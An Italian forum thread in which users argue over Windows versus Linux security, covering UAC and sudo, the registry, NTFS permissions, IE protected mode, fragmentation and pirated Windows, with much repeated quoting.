Il registro è un database diviso in 3 file. In Linux usano file .ini.
La differenza?
Con il file .ini non devi passare attraverso un programma, essendo semplici file di testo qualunque programma può modificarlo una volta che ha i diritti di accesso. Potrebbe grazie ad un errore del programma cancellarlo completamente, oppure meno catastroficamente cancellare male una chiave oppure duplicarla.

Con il registro invece DEVI usare delle API. Una volta che hai i diritti di amministratore per eliminarlo dovresti cancellare una ad una tutte le chiavi, di cui devi sapere il nome. In questo ipotetico caso il DBMS del registro potrebbe anche accorgersene e bloccarti. ;)
Non puoi duplicare una chiave già esistente, e non puoi cancellarla male perchè non è affar tuo come viene memorizzata ma ci pensa il DBMS.


NTFS invece secondo me è più avanzato in sistema di sicurezza, perchè si basa su una pianificazione più avanzata dei permessi utente di Windows. Anche in 2000.

E qui ricasca l'asino (scusa eh ;)) perché IE7/Vista con Modalità protetta + DEP è più sicuro di FFox/Vista, sempre che tu sappia cosa sono la Modalità protetta e il DEP...
Anche quelli di mozilla la invidiano:
https://wiki.mozilla.org/Mozilla_2/Protected_mode
https://wiki.mozilla.org/Firefox/Feature_Brainstorming:Security
Io veramente ho scritto Linux + Firefox 3..di che asino parli ? :)

Ed inoltre se per navigare in internet (per fare un esempio) utilizzo Linux con Firefox 3 invece del Windows con Internet Explorer (so che c'è anche Firefox..lo so) non mi sento un alieno..ma un pò più tranquillo si. ;)Di Firefox si possono elogiare decine di altre cose... ma non è assolutamente più sicuro di Internet Explorer (7) in modalità protetta! ;)

Queste sono le frasi che la gente che non sa, tira in ballo.
Il registro è un database diviso in 3 file. In Linux usano file .ini.
La differenza?
Con il file .ini non devi passare attraverso un programma, essendo semplici file di testo qualunque programma può modificarlo una volta che ha i diritti di accesso. Potrebbe grazie ad un errore del programma cancellarlo completamente, oppure meno catastroficamente cancellare male una chiave oppure duplicarla.

Con il registro invece DEVI usare delle API. Una volta che hai i diritti di amministratore per eliminarlo dovresti cancellare una ad una tutte le chiavi, di cui devi sapere il nome. In questo ipotetico caso il DBMS del registro potrebbe anche accorgersene e bloccarti. ;)
Non puoi duplicare una chiave già esistente, e non puoi cancellarla male perchè non è affar tuo come viene memorizzata ma ci pensa il DBMS.


NTFS invece secondo me è più avanzato in sistema di sicurezza, perchè si basa su una pianificazione più avanzata dei permessi utente di Windows. Anche in 2000.
Ferraglia..

Il tuo...

Vuoi dare torto anche agli sviluppatori di Firefox? Sapranno i problemi del loro prodotto.
Ferraglia..Come volevasi dimostrare.

Di Firefox si possono elogiare decine di altre cose... ma non è assolutamente più sicuro di Internet Explorer (7) in modalità protetta! ;)
Esiste Internet Explorer per Linux ? No.
Ecco..con Linux + Firefox 3 mi sento più sicuro di Windows + Internet Explorer.
Questo ho scritto.
Discutibile ?
Certo..tuttavia..

In realtà non è una "falla", ma l'ovvia conseguenza del design di default dell'UAC in Win7.
Ovvio, e l'ho sempre detto e scritto anche in questo forum che su Win7 va impostato come era su Vista l'UAC (http://www.hwupgrade.it/forum/showthread.php?p=25342798#post25342798) per stare sicuri: al massimo livello. Non quello di default anti-rottura® per far contenti gli ignoranti abituati a 7 anni di XP e che "non vogliono essere disturbati" poverini.... :rolleyes:
Io sono felice che il sistema mi chieda, quando voglio cambiare impostazioni, il permesso di amministratore.
QUOTONE! Difatti pure io su Seven tengo UAC al massimo livello, non mi ha mai convinto la nuova politica che tutto ciò che è firmato "Microsoft" passa senza chiedere la conferma

Beh ma basta che levino dall'UAC il certificato che lo identifica come servizio di Windows 7, cosi sarà chiesta sempre la conferma per la disattivazione.
Non capisco perchè abbiano chiuso i feedback come "by desing", basta poco per risolvere il problema, senza modificare il funzionamento del nuovo UAC (meno invasivo rispetto a Vista) ma mantenendo alto il livello di sicurezza.

Esiste Internet Explorer per Linux ? No.
Ecco..con Linux + Firefox 3 mi sento più sicuro di Windows + Internet Explorer.
Questo ho scritto.
Discutibile ?
Certo..tuttavia..Vero, ma allora perchè non consideriamo se è più sicuro Panda + cinture + air bag rispetto a Ferrari + cinture + air bag?

Già che ci siamo, controlliamo tutte le opzioni.

Vero, ma allora perchè non consideriamo se è più sicuro Panda + cinture + air bag rispetto a Ferrari + cinture + air bag?

Già che ci siamo, controlliamo tutte le opzioni.
Per navigare in internet il Windows è una Ferrari e il Linux una Panda ?
Suvvia. ;)
Se mi dici per giocare con i moderni videogiochi 3D..allora si.

Per navigare in internet il Windows è una Ferrari e il Linux una Panda ?
Suvvia. ;)
Se mi dici per giocare con i moderni videogiochi 3D..allora si.Ora stai iniziando flame, non ho fatto alcun paragone io... :rolleyes:

Ora stai iniziando flame, non ho fatto alcun paragone io... :rolleyes:
A no ?
Allora finiamola qui..ma a me sembrava poco velato il tuo paragone. :)
O era un modo per dire che vanno considerati tutti gli aspetti di un sistema operativo ?

...Anche su tutti gli altri sistemi c'è il "sudo" che è strutturalmente meno sicuro(non che più puzzolente) di UAC perchè eleva l'intero utente per un periodo di tempo ad amministratore. UAC solo quel processo.
Anche su altri sistemi quindi lo farebbero senza leggere, portandolo allo stesso livello.

non per dire, ma il sudo è configurabilissimo, si puo' decidere quali processi o no far partire....è una caxxata asserire "lo eleva ad amministratore" lo eleva, a cosa è stato deciso di essere elevato, e per il tempo che è stato configurato.... dall'utente stesso, o se non lo si modifica, da chi ha configurato la distro,come in ogni altra cosa in linux, sudo ha il suo file di configurazione (editabile tramite tool grafici).

inoltre non è che linux è sudo eh.....

il sudo è stato portato "alla massa" da ubuntu e compagnia....
ma io prima ho sempre avuto gli account separati(e ancora oggi li ho), con eventuale login con su nel caso in cui mi servisse....
standard nella opensuse ad esempio, per moltii comandi "di sistema", non basta il sudo, devi loggarti su... e io personalmente, il sudo non lo uso piu' di tanto...

e cmq le sessioni grafiche di SU (kdesu, gsudo) hanno durata limitata all'applicazione,e sono queste che si dovrebbero paragonare a quelle di uac solo nel caso di uso da terminale si prolungano per un tot di tempo (ma cmq come ho detto basta configurare sudo)

se poi ci aggiungi che il 95% dei programmi che ti servono, sono nei repository, e che quindi sono controllati, e sicuramente non nocivi....

e in piu' ci aggiungiamo... la configurazione dei gruppi, degli utenti.... si arriva ad un grado di personalizzazione dei permessi quasi infinito (se vuoi ad un utente puoi attivare il microfono, e ad un altro no)



cmq a me piace UAC per windows, e non so come sia con windows7, ma quello di vista mi sta bene... piu' che altro perchè "addestrera'" i programmatori di software, a non abusare dei diritti di amministratore standard in xp....

solo che metterei anche li' l'inserimento di una password
inserire una password ti fa pensare
clickare ok nella generazione degli utonti"avanti, avanti, avanti, fine" non server a nulla. gia' nelle installazioni sono abituati a non leggere nulla, figurati per aprire una finestra di configurazione del mouse o boh... verra' preso allo stesso modo di avanti "clicko"

L'UAC concettualmente non mi sembra chissà che cosa..secondo me in XP era implementabile senza RIVOLUZIONI.

Non te la prendere ma questo la dice lunga sulla tua conoscenza in materia.

Non te la prendere ma questo la dice lunga sulla tua conoscenza in materia.
Me la prenderei se la critica fosse portata avanti da qualcuno di autorevole.

è una caxxata asserire "lo eleva ad amministratore" lo eleva, a cosa è stato deciso di essere elevato, e per il tempo che è stato configurato...Eleva l'intero utente, non il singolo processo come UAC. Almeno così mi è stato detto
e in piu' ci aggiungiamo... la configurazione dei gruppi, degli utenti.... si arriva ad un grado di personalizzazione dei permessi quasi infinito (se vuoi ad un utente puoi attivare il microfono, e ad un altro no)In Linux hai solo lettura, scrittura ed esecuzione, per l'utente, il suo gruppo e chiunque.

In Windows hai molte più cose, e oltre che per il proprio utente, il proprio gruppo e chiunque hai altri gruppi, altri singoli utenti...

e in piu' ci aggiungiamo... la configurazione dei gruppi, degli utenti.... si arriva ad un grado di personalizzazione dei permessi quasi infinito (se vuoi ad un utente puoi attivare il microfono, e ad un altro no)


Ma veramente se c'è una cosa in cui Windows è superiore a Linux sono proprio le ACL.

In Linux hai solo lettura, scrittura ed esecuzione, per l'utente, il suo gruppo e chiunque.

In Windows hai molte più cose, e oltre che per il proprio utente, il proprio gruppo e chiunque hai altri gruppi, altri singoli utenti...

In Linux hai lettura, scrittura ed esecuzione per il PROPRIETARIO, il gruppo e chiunque. Questo limita proprio nel caso si vogliano aggiungere singoli utenti (senza utilizzare i gruppi) alle ACL del file, cosa che invece puoi fare per Windows.

E non solo, hai anche le sharing permission, le NTFS permission (e ci puoi giocare con le due facendo milioni di combinazioni diverse), idem con il permesso e la negazione delle varie autorizzazioni, con una che prevale sull'altra al verificarsi di determinate condizioni e cosi via...
Le ACL di Windows sono veramente un mondo sconfinato.

I permessi NTFS sono così tanti e variegati che praticamente alla fine ci vogliono i permessi dei permessi dei permessi per fare un qualcosa dove in realtà sarebbe bastato un click senza rischi di autorizzare ciò che si era pensato di negare..una struttura tanto inutilmente complesa..
File System pure da deframentare (nel 2009)..ma questa è un'altra storia..non è una ferraglia..è all'avanguardia dei file system!!
Ma va va..Microsoft..sveglia!
Magari con il prossimo Windows..nel 2012..

Me la prenderei se la critica fosse portata avanti da qualcuno di autorevole.

Non serve uno autorevole per giudicare la tua conoscenza in materia dalle cose che scrivi... Basta uno che conosce l'argomento anche in maniera superficiale perchè te sei completamente digiuno anche delle basi. Come si può pensare altrimenti che per fare un completo ripensamento dei privilegi di funzionamento di tutto un'OS come successo da XP a Vista con relativo model driver cambiato (passati dal kernel space all'user space appunto) bastasse un service pack e addirittura senza una rivoluzione come dici tu?

Lo sai perchè dici che secondo te non serviva una rivoluzione? Perchè non hai la più pallida idea di cosa ci sia dietro quella finestrella di richiesta di elevazione di privilegi. Mi auguro che almeno non pensi che "bastava mettere la finestrella ad XP".

In Linux hai lettura, scrittura ed esecuzione per il PROPRIETARIOSì scusa, intendevo proprietario...

Per il resto è quello che intendevo io.

File System pure da deframentare (nel 2009)Aspetto il nome di un file system che non si frammenta. :)

L'ultimo aveva detto EXT3, e si frammenta. Aspetto il tuo.

Io veramente ho scritto Linux + Firefox 3..di che asino parli ? :)

Di quello che fa lo gnorri ;) quando afferma:


Ed inoltre se per navigare in internet (per fare un esempio) utilizzo Linux con Firefox 3
dove sottointendi: sicuro
invece del Windows con Internet Explorer (so che c'è anche Firefox..lo so) non mi sento un alieno. ;)
dove sottointendi: poco sicuro IE, anche se c'è FFox pure per Win che è più sicuro. E io ti ho risposto che non lo è...
:Prrr:

Io rimango dell'idea che siamo tutti sulla stessa barca, a livello di sicurezza....

a xsim.. tra le tante cose che ha detto (e continuo a ribadire su base ideologica).. un merito però ce l'ha:
ha fatto sviluppare una discussione interessante (fino a questo momento).

:sofico:

cmq a me piace UAC per windows, e non so come sia con windows7, ma quello di vista mi sta bene... piu' che altro perchè "addestrera'" i programmatori di software, a non abusare dei diritti di amministratore standard in xp....
Già, almeno nelle giuste intenzioni di MS... invece gli utenti e programmatori cosa fanno? Continuano imperterriti e piuttosto si lamentano del UAC e suggeriscono di disattivarlo :nono:
Sempre stato d'accordo con questa "linea dura" di MS per spingere finalmente anche in ambienti Win ad una certa sicurezza.

Sono convinto che quando tutta l'utenza Win sarà passata a Win7/Vista la diffusione di malware e virus, o per meglio dire, di macchine infettate calerà lentamente ai minimi storici, almeno di un 50% sebbene esisteranno sempre gli utonti...

solo che metterei anche li' l'inserimento di una password
inserire una password ti fa pensare
clickare ok nella generazione degli utonti"avanti, avanti, avanti, fine" non server a nulla. gia' nelle installazioni sono abituati a non leggere nulla, figurati per aprire una finestra di configurazione del mouse o boh... verra' preso allo stesso modo di avanti "clicko"
Si può tranquillamente fare in modo che Vista chieda la pass con l'UAC requester ma ragionevolmente di default non è così (già l'utonto medio odia UAC, figuriamoci costringerlo anche a scrivere...): http://technet.microsoft.com/it-it/magazine/cc138019.aspx
Per attivare la richiesta di inserimento password ad ogni UAC requester se non ricordo male...:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
ConsentPromptBehaviorAdmin REG_DWORD 0x2

(2= requester Continua, Annulla; 1= chiedi login/pass)

Mi auguro che sistemino al più presto il bug, e secondo me una possibilità, facile, c'è: un quinto livello, sottostante il livello massimo, che agisce come quello, ma "do not dim my desktop", cioé non mi scurisce il desktop e non interferisce con altre operazioni che ho in corso oltre all'azione da autorizzare. Che, secondo me, molti dei fastidi erano dovuti al fatto che su Vista ti interrompe anche le altre operazioni che stai facendo, non tanto per la quantità di prompt. Prompt che sono "per il nostro bene", per non farci combinare magari delle operazioni che possano danneggiare il sistema. Quanto scommettiamo che, con questo livello quasi-massimo, si potrà accontentare molta gente? :)

Cmq, se questo è il risultato della battaglia da parte dei critici dell'UAC, che dire, ottimo risultato. Per loro. Pessimo. Per tutti.

Nel frattempo ho rialzato l'UAC, che a me piaceva questo fatto che non mi oscurava il desktop, peccato, ma con la sicurezza meglio non scherzare... :(

EDIT: per evitare fraintendimenti, mi è stata fatta notare la natura reale dell'oscuramento. Direi che, a ragion veduta, è meglio così :)

su Vista ti interrompe anche le altre operazioni che stai facendo

FALSISSIMO!
Se stai facendo altre cose e all'improvviso un altro programma diverso da quello che tu stai usando in quel momento tenta di elevarsi ad amministratore, la finestra dello UAC di Vista è minimizzata lampeggiando sulla taskbar e tu non vieni interrotto.

Non serve uno autorevole per giudicare la tua conoscenza in materia dalle cose che scrivi... Basta uno che conosce l'argomento anche in maniera superficiale perchè te sei completamente digiuno anche delle basi. Come si può pensare altrimenti che per fare un completo ripensamento dei privilegi di funzionamento di tutto un'OS come successo da XP a Vista con relativo model driver cambiato (passati dal kernel space all'user space appunto) bastasse un service pack e addirittura senza una rivoluzione come dici tu?

Lo sai perchè dici che secondo te non serviva una rivoluzione? Perchè non hai la più pallida idea di cosa ci sia dietro quella finestrella di richiesta di elevazione di privilegi. Mi auguro che almeno non pensi che "bastava mettere la finestrella ad XP".
http://www.replaceuac.com/
Toh! ..avranno riscritto il kernel dell'XP.
Ma va va..

FALSISSIMO!
Se tu stai facendo altre cose e all'improvviso un altro programma tenta di elevarsi ad amministratore, la finestra dello UAC è minimizzata lampeggiando sulla taskbar e tu non vieni interrotto

Non hai tutti i torti, effettivamente... Però calmati, dai, il maiuscolo significa urlare... ;)

Aspetto il nome di un file system che non si frammenta. :)

L'ultimo aveva detto EXT3, e si frammenta. Aspetto il tuo.
Il punto è che la frammentazione esiste in TUTTI i file system..ma questa riduce le prestazioni in uno piuttosto che nell'altro.
Per esempio l'NTFS soffre tantissimo la frammentazione (e da qui la necessità di utilizzare programmi ad hoc per risistemare i files e le cartelle dell'hard disk)..altri, come ZFS, praticamente non ne soffrono per nulla.

http://www.replaceuac.com/
Toh! ..avranno riscritto il kernel dell'XP.
Ma va va..

replaceuac è un programma che non implementa nessun meccanismo di sicurezza reale, è soltanto uno scimmiottamento.

Mi auguro che sistemino al più presto il bug, e secondo me una possibilità, facile, c'è: un quinto livello, sottostante il livello massimo, che agisce come quello, ma "do not dim my desktop", cioé non mi scurisce il desktop e non interferisce con altre operazioni che ho in corso oltre all'azione da autorizzare. Che, secondo me, molti dei fastidi erano dovuti al fatto che su Vista ti interrompe anche le altre operazioni che stai facendo, non tanto per la quantità di prompt.
È importante che lo faccia! Quello schermo oscurato che vedi viene aperto sul cosiddetto Secure Desktop che è uno schermo a parte e in una sessione a parte (né utente, né normale admin). Se si aprisse senza Secure Desktop saresti esposto a facili attacchi di spoofing o shatter attack per intercettare quella finestra UAC aperta... Isolandolo su Secure Desktop invece ne aumenti notevolmente la sicurezza.

Nel frattempo ho rialzato l'UAC, che a me piaceva questo fatto che non mi oscurava il desktop, peccato, ma con la sicurezza meglio non scherzare... :(
In realtà su Vista puoi, volendo farti del male, disattivare selettivamente solo il Secure Desktop nelle Policy di sicurezza ma come ti ho spiegato è meno sicuro...

N.B.
Una nota a riguardo del Secure Desktop oscurato su Vista: ho scoperto che alcuni si lamentano della lentezza con cui appare UAC, preceduto e succeduto ;) (seguito) da uno schermo nero che può durare dai 2÷5 secondi.
Tutti quelli a cui succede sappiano che NON È NORMALE ed è solo colpa dei driver video. Con driver video buoni l'oscuramento e comparsa dell'UAC è immediato!
Di questo pochi o nessuno parla e nella sua innocente ignoranza dà la colpa a Vista se "l'UAC è lento". Non è così: trovatevi un driver video decente. Su questi sistemi con driver video bacati, anche lo schermo che appare premendo ctrl+alt+canc è preceduto e seguito da quel lento black-out, a riprova che non è l'UAC ma un problema di cambio di schermo dei driver video (tipicamente nVidia).

È importante che lo faccia! Quello schermo oscurato che vedi viene aperto sul cosiddetto Secure Desktop che è uno schermo a parte e in una sessione a parte (né utente, né normale admin). Se si aprisse senza Secure Desktop saresti esposto a facili attacchi di spoofing o shatter attack per intercettare quella finestra UAC aperta... Isolandolo su Secure Desktop invece ne aumenti notevolmente la sicurezza.


Allora lo sopporterò, non avevo pensato al motivo reale di quell'oscuramento, meglio la sicurezza all'estetica :)

Di quello che fa lo gnorri ;) quando afferma:


dove sottointendi: sicuro

dove sottointendi: poco sicuro IE, anche se c'è FFox pure per Win che è più sicuro. E io ti ho risposto che non lo è...
:Prrr:
Per mia natura non sottointendo mai :) ..mi sento più sicuro in Linux..perchè ? Perchè ci sono molti meno software malevoli..stop.

a xsim.. tra le tante cose che ha detto (e continuo a ribadire su base ideologica).. un merito però ce l'ha:
ha fatto sviluppare una discussione interessante (fino a questo momento).

:sofico:
Ma se agisco su base ideologica contro Microsoft..perchè caspita allora mi sono fatto un culetto così per far si che il Windows 7 64 bit ed il Vista 64 bit funzionassero degnamente anche sul mio PC ? :)
E perchè mai riservo una buona parte del mio Hard Disk per sistemi operativi Microsoft ?
Sarebbe un controsenso.

replaceuac è un programma che non implementa nessun meccanismo di sicurezza reale, è soltanto uno scimmiottamento.
Come si può scimmiottare ciò che è già uno scimmiottamento ?
Mistero.

http://www.replaceuac.com/
Toh! ..avranno riscritto il kernel dell'XP.
Ma va va..

Continui solo a confermare quanto non hai capito minimamente nulla dell'argomento di cui parli. Io ti consiglio di lasciare stare ed informarti un bel pò ;)

replaceuac è un programma che non implementa nessun meccanismo di sicurezza reale, è soltanto uno scimmiottamento.

Per lui l'UAC è una finestrella dove cliccare si o no... E come tale facilmente implementabile ovunque. Non ha capito che per l'UAC fatto come su Vista serve un'OS ripensato dalla base, con applicazioni ripensate dalla base e con driver ripensati dalla base.

Risolto con un positivo chiarimento la questione oscuramento, l'unica cosa che diciamo manca all'UAC è una opzione per autorizzare un programma fidato a fare una determinata operazione senza ulteriori prompt. Con la possibilità sempre di revocargli da Pannello di Controllo questa "concessione".

Per il resto, questo calo di sicurezza di default mi rafforza il pensiero della sconfitta per chi sostiene come me l'UAC e in generale tutti i sistemi protettivi per evitare passi falsi all'utente che non sa ciò che sta facendo. Che peccato... Ha ragione hexaae, quando MS tenta di dare più sicurezza viene criticata, ora la riduce e viene criticata ancor di più, non c'è mai una via di mezzo, solo critica tout-court o a prescindere :(

Per lui l'UAC è una finestrella dove cliccare si o no... E come tale facilmente implementabile ovunque. Non ha capito che per l'UAC fatto come su Vista serve un'OS ripensato dalla base, con applicazioni ripensate dalla base e con driver ripensati dalla base.
Sarà..ho i miei dubbi.."ripensato dalla base" vorrebbe dire il passaggio da Win9x a NT..a casa mia.

Continui solo a confermare quanto non hai capito minimamente nulla dell'argomento di cui parli. Io ti consiglio di lasciare stare ed informarti un bel pò ;)
Non mi hai ancora scritto le righe di codice che implementano l'UAC..ma essendo il Windows per sua natura closed source non ne possiamo sapere un caxxo ne io ne te. :D
Quello che scrive Microsoft sulle sue features va accettato ciecamente..e questo è quello che sai.

..
E perchè mai riservo una buona parte del mio Hard Disk per sistemi operativi Microsoft ?
Sarebbe un controsenso.
no, non è un controsenso.. perchè sai benissimo che tutti usano un sistema microsoft, anche utilizzando altri SO, se non altro per curiosità e per poterlo poi criticare.

Non codivido ovviamente chi (la maggior parte) prova i Sistemi Operativi Microsoft piratati o craccati, sia per un motivo di NON SENSE (non dico morale) e sia per un motivo tecnico e cioè, a parte XP, VISTA e SEVEN piratati NON potranno mai e poi mai funzionare bene... e quindi mi domando che senso ha usare (da un punto di vista tecnico) un sistema piratato ? Che soddisfazione potrà mai dare ? Non è meglio utilizzare i sistemi alternativi open se uno non vuole spendere soldi ?
Insomma la pirateria sul sistema operativo non ha molto senso... e ti posso assicurare che leggendo tutte le problematiche (assurde) di VISTA sul forum.. si capisce benissimo chi usa sistemi piratati o moddati ad cazzum.

Ben vengano le critiche se costruttive e se di aiuto a migliorare un prodotto che volente o nolente, nel mondo rappresenta uno standard universale.

All'utente e a tutti.. addetti ai lavori e non.. questo interessa.. un linguaggio e programmi universali.. e non gli "interessi" di bottega dell'uno o dell'altro.

Che poi questa unicità oggi si chiama Microsoft, non ha importanza, per quanto mi riguarda potrebbe pure chiamarsi in un altro modo.

Approfitto per dirti che:
per quanto riguarda la frammentazione del disco, non dipende dal File System.. ma dalla natura dei dischi stessi... se non vuoi più vedere la frammentazione del disco è sufficiente che ti compri un bel SSD, oggi ancora di piccoli tagli e prezzi ancora leggermente alti.. ma fra qualche mese gli SSD sarà lo standard, magari inizialmente solo per installarci il SO ed un disco capiente per lo storage.

Gli SSD ti ricordo che oggi sono ben gestisti sia da VISTA che da Se7en che già contemplano l'ottimizzazione della gestione di tale "nuovo" e performante hardware.

..quindi come vedi :D .. anche sull' NTFS :mc: :D

Sarà..ho i miei dubbi.."ripensato dalla base" vorrebbe dire il passaggio da Win9x a NT..a casa mia.

A casa tua quindi per cambiare radicalmente un sistema operativo bisogna cambiare kernel e FS. Tra XP e Vista infatti è cambiato sia il kernel che il FS (vista ha l'NTFS 6.0, XP il 5) quindi già siamo di fronte allo stesso stravolgimento che citi tu ma probabilmente neanche lo sapevi.

Detto questo è un discorso che comunque non sta in piedi... Ci sono mille scelte di design che possono portare grossi cambiamenti in un'OS senza per questo cambiare kernel e FS ed il mondo linux in quest'ambito dovrebbe fare scuola. E' come dire che per mettere lo stesso motore alla panda, la punto e la musa non devi ripensare nulla perchè non cambia nulla.

Non mi hai ancora scritto le righe di codice che implementano l'UAC..ma essendo il Windows per sua natura closed source non ne possiamo sapere un caxxo ne io ne te. :D
Quello che scrive Microsoft sulle sue features va accettato ciecamente..e questo è quello che sai.

Vabè, adesso stai trollando su UAC, su...
Se vuoi documentarti bene e capire meglio cos'è devi leggerti attentamente questo documento che spiega tutto: http://technet.microsoft.com/it-it/magazine/cc138019.aspx

Non mi hai ancora scritto le righe di codice che implementano l'UAC..ma essendo il Windows per sua natura closed source non ne possiamo sapere un caxxo ne io ne te. :D
Quello che scrive Microsoft sulle sue features va accettato ciecamente..e questo è quello che sai.

Ma cosa c'entra il codice? Dai, ma per favore... Cambia argomento che è meglio. Si sta parlando di design e funzionamento del sistema e quello è ampiamente documentato. Il codice "closed" non c'entra proprio nulla.

no, non è un controsenso.. perchè sai benissimo che tutti usano un sistema microsoft, anche utilizzando altri SO, se non altro per curiosità e per poterlo poi criticare.

Non codivido ovviamente chi (la maggior parte) prova i Sistemi Operativi Microsoft piratati o craccati, sia per un motivo di NON SENSE (non dico morale) e sia per un motivo tecnico e cioè, a parte XP, VISTA e SEVEN piratati NON potranno mai e poi mai funzionare bene... e quindi mi domando che senso ha usare (da un punto di vista tecnico) un sistema piratato ? Che soddisfazione potrà mai dare ? Non è meglio utilizzare i sistemi alternativi open se uno non vuole spendere soldi ?
Insomma la pirateria sul sistema operativo non ha molto senso... e ti posso assicurare che leggendo tutte le problematiche (assurde) di VISTA sul forum.. si capisce benissimo chi usa sistemi piratati o moddati ad cazzum.

Ben vengano le critiche se costruttive e se di aiuto a migliorare un prodotto che volente o nolente, nel mondo rappresenta uno standard universale.

All'utente e a tutti.. addetti ai lavori e non.. questo interessa.. un linguaggio e programmi universali.. e non gli "interessi" di bottega dell'uno o dell'altro.

Che poi questa unicità oggi si chiama Microsoft, non ha importanza, per quanto mi riguarda potrebbe pure chiamarsi in un altro modo.

Approfitto per dirti che:
per quanto riguarda la frammentazione del disco, non dipende dal File System.. ma dalla natura dei dischi stessi... se non vuoi più vedere la frammentazione del disco è sufficiente che ti compri un bel SSD, oggi ancora di piccoli tagli e prezzi ancora leggermente alti.. ma fra qualche mese gli SSD sarà lo standard, magari inizialmente solo per installarci il SO ed un disco capiente per lo storage.

Gli SSD ti ricordo che oggi sono ben gestisti sia da VISTA che da Se7en che già contemplano l'ottimizzazione della gestione di tale "nuovo" e performante hardware.

..quindi come vedi :D .. anche sull' NTFS :mc: :D
Per la frammentazione ho già spiegato che tutti gli Hard Disk e i relativi file system frammentano i files e le cartelle..ma alcuni file system gestiscono la frammentazione senza praticamente perdere in prestazioni..NTFS no..FAT16 e FAT32 ben che meno.
Per quanto riguarda il Windows..la sua fortuna è stata anche la pirateria (a livello domestico)..ma soprattutto il venderlo insieme ai PC.
Personalmente piratato o meno non me ne importa nulla (ognuno agisce secondo coscienza)..per videogiocare o usare applicativi specifici a pagamento serve..punto.
Oggi come oggi.

Ma cosa c'entra il codice? Dai, ma per favore... Cambia argomento che è meglio. Si sta parlando di design e funzionamento del sistema e quello è ampiamente documentato. Il codice "closed" non c'entra proprio nulla.
Tutto questo perchè ho OSATO dire che l'UAC (così come apparso in Vista) si poteva implementare anche nell'XP ?
Se ci pensiamo il Linux con Security-Enhanced Linux va ben oltre: http://en.wikipedia.org/wiki/Selinux ..quello si che è ultra configurabile e serio.

P.S.
http://www.nsa.gov/research/selinux/index.shtml
Aprite gli occhi e guardate oltre l'UAC..che Microsoft non ha inventato nulla.

Long Zheng proporrebbe una soluzione al problema, sebbene non al 100% (ma non lo sarà mai, a questo punto, credo) http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/ :

This is the part where one would usually demand a large sum of money but since I’m feeling generous, there is a simple fix to this problem Microsoft can implement without sacrificing any of the benefits the new UAC model provides, and that is to force a UAC prompt in Secure Desktop mode whenever UAC is changed, regardless of its current state. This is not a fool-proof solution (users can still inadvertently click “yes”) but a simple one I would encourage Microsoft to implement seeing how they’re on a tight deadline to ship this.

Ma condivido soprattutto ciò:
Having UAC on at the policy as it is currently implemented in Windows 7 is as good as not having it on at all.

Per ora (e non solo per ora, secondo me), l'unica soluzione per sentirsi più al sicuro possibile è di innalzarlo al livello massimo.

Per quanto riguarda il Windows..la sua fortuna è stata anche la pirateria (a livello domestico)..ma soprattutto il venderlo insieme ai PC.
si, però aggiorniamoci anche.. stai parlando degli albori dell'informatica e di una fase iniziale che finisce con XP.

Con VISTA la Microsoft è passata alla fase 2 di una strategia, tra l'altro dichiarata.. e questo ha dato fastidio a molti.

Scordiamoci che i veri nuovi sistemi operativi a 64bit Microsoft siano facilmente craccabili come lo era XP.. è finita tale fase.. potranno essere aggirati, utilizzati in parte... ma mai pienamente.
E per pienamente intendo un sistema che si aggiorna quotidianamente sotto tutti i profili ed in particolare sotto il profilo sicurezza. :read:

Un sistema non aggiornato, non serve a nulla e a nessuno e fa solo danni a chi lo usa e anche a tutti gli altri utenti di internet.

E a mio modo di vedere, sono proprio questi "gli utonti" ;).. che paradossalmente sono quelli che danno degli utonti agli altri. :D

Scordiamoci che i veri nuovi sistemi operativi a 64bit Microsoft siano facilmente craccabili come lo era XP.. è finita tale fase.. potranno essere aggirati, utilizzati in parte... ma mai pienamente.
E per pienamente intendo un sistema che si aggiorna quotidianamente sotto tutti i profili ed in particolare sotto il profilo sicurezza. :read:

Un sistema non aggiornato, non serve a nulla e a nessuno e fa solo danni a chi lo usa e anche a tutti gli altri utenti di internet.

E a mio modo di vedere, sono proprio questi "gli utonti" ;).. che paradossalmente sono quelli che danno degli utonti agli altri. :D
A Fantasilandia..nella realtà l'XP x64, il Vista x64 e così come lo sarà il Windows 7 x64 sono pienamente "crackabili"..senza limitazioni di sorta.
Personalmente non mi tange perchè le licenze OEM le pago poco..ma è così..tanta protezione..ma soltanto sulla carta.

.. il Vista x64 e così come lo sarà il Windows 7 x64 sono pienamente "crackabili"..senza limitazioni di sorta.
..si, però poi non ci lamentiamo che il sistema non funziona bene e giù a spalare cacca su Microsoft ;)

..si, però poi non ci lamentiamo che il sistema non funziona bene e giù a spalare cacca su Microsoft ;)
Ovvio..chi non ha pagato un prodotto non ha diritto a lamentarsi..pacifico.
Cosa non recepita da tutti, me ne rendo conto.

no, non è un controsenso.. perchè sai benissimo che tutti usano un sistema microsoft, anche utilizzando altri SO, se non altro per curiosità e per poterlo poi criticare.

Non codivido ovviamente chi (la maggior parte) prova i Sistemi Operativi Microsoft piratati o craccati, sia per un motivo di NON SENSE (non dico morale) e sia per un motivo tecnico e cioè, a parte XP, VISTA e SEVEN piratati NON potranno mai e poi mai funzionare bene... e quindi mi domando che senso ha usare (da un punto di vista tecnico) un sistema piratato ? Che soddisfazione potrà mai dare ? Non è meglio utilizzare i sistemi alternativi open se uno non vuole spendere soldi ?
Insomma la pirateria sul sistema operativo non ha molto senso... e ti posso assicurare che leggendo tutte le problematiche (assurde) di VISTA sul forum.. si capisce benissimo chi usa sistemi piratati o moddati ad cazzum.

Ben vengano le critiche se costruttive e se di aiuto a migliorare un prodotto che volente o nolente, nel mondo rappresenta uno standard universale.

All'utente e a tutti.. addetti ai lavori e non.. questo interessa.. un linguaggio e programmi universali.. e non gli "interessi" di bottega dell'uno o dell'altro.

Che poi questa unicità oggi si chiama Microsoft, non ha importanza, per quanto mi riguarda potrebbe pure chiamarsi in un altro modo.

Approfitto per dirti che:
per quanto riguarda la frammentazione del disco, non dipende dal File System.. ma dalla natura dei dischi stessi... se non vuoi più vedere la frammentazione del disco è sufficiente che ti compri un bel SSD, oggi ancora di piccoli tagli e prezzi ancora leggermente alti.. ma fra qualche mese gli SSD sarà lo standard, magari inizialmente solo per installarci il SO ed un disco capiente per lo storage.

Gli SSD ti ricordo che oggi sono ben gestisti sia da VISTA che da Se7en che già contemplano l'ottimizzazione della gestione di tale "nuovo" e performante hardware.

..quindi come vedi :D .. anche sull' NTFS :mc: :D

